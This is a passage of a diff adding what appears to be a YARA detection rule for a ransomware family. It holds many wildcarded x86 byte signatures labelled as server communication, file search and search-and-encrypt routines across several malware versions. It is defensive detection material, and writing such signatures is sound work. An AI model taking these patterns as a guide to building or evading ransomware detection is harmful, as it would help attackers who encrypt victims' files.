+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44
+            24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ??
+            ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75
+            F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83
+            C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15
+        }
+		$server_communication_0_2_6a_2 = {
+            A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
+            53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6
+        }
+		$server_communication_0_3_1_1 = {
+            8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ??
+            ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ??
+            ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ??
+            8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C
+            24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14
+            85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50
+            57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF
+            15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C
+        }
+		$server_communication_0_3_1_2 = {
+            24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ??
+            ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3
+        }
+		$server_communication_0_3_3_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75
+            F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0
+            83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6
+            EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51
+            8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51
+            52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24
+        }
+		$server_communication_0_3_3_2 = {
+            52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52
+            57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF
+            D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5
+        }
+		$server_communication_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB
+            04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D
+            ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50
+            A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
+        }
+		$server_communication_0_3_4a_2 = {
+            8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ??
+            ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8
+            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE
+            FD FF FF 8B 44 24 ?? 50 FF 15
+        }
+		$server_communication_0_3_5a_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44
+            24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50
+            68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ??
+            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83
+            C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ??
+            ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ??
+            83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8
+        }
+		$server_communication_0_3_5a_2 = {
+            8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ??
+            ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50
+            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54
+            24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15
+        }
+		$server_communication_2_0_4e = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ??
+            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ??
+            ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68
+            ?? ?? ?? ?? FF 15
+        }
+		$search_and_encrypt_2_0_4e_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56
+            57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84
+        }
+		$search_and_encrypt_2_0_4e_2 = {
+            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
+        }
+		$search_and_encrypt_2_0_4e_3 = {
+            8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84
+        }
+		$search_and_encrypt_2_0_4e_4 = {
+            8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ??
+            66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8
+        }
+		$search_and_encrypt_2_0_4e_5 = {
+            8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ??
+            ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83
+            C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ??
+            83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15
+        }
+		$server_communication_4_0_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24
+        }
+		$server_communication_4_0_2 = {
+            8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D
+            ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB
+            75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C
+            ?? ?? ?? ?? 50 E8
+        }
+		$server_communication_4_0_3 = {
+            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2]
+            8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ??
+            ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50
+        }
+		$file_search_4_0_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ??
+            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 51 E8
+        }
+		$file_search_4_0_2 = {
+            74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
